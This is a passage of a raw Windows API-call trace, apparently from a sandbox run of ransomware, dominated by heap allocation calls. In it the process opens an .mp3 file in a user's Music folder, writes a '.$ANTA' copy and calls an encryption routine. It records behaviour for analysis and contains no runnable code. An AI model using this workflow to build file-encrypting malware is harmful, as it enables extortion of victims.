HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.682] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0114.682] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0114.682] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\mxxesxxst_.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0114.683] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.683] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0114.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0114.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.683] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0114.684] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e400 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.685] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9")) returned 0x10 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0114.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0114.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.685] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\mxxesxxst_.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0114.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.686] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0114.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0114.687] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0114.687] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0114.687] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0114.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0114.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0d020 [0114.691] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0114.691] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0xbdad, lpOverlapped=0x0) returned 1 [0114.694] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0114.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdad) returned 0x4516010 [0114.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0114.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0114.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdad) returned 0x4521dc8 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.700] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdad) returned 0x4516010 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.700] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0114.701] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0114.701] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0114.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0114.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdad) returned 0x4516010 [0114.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0114.702] RtlAllocateHeap 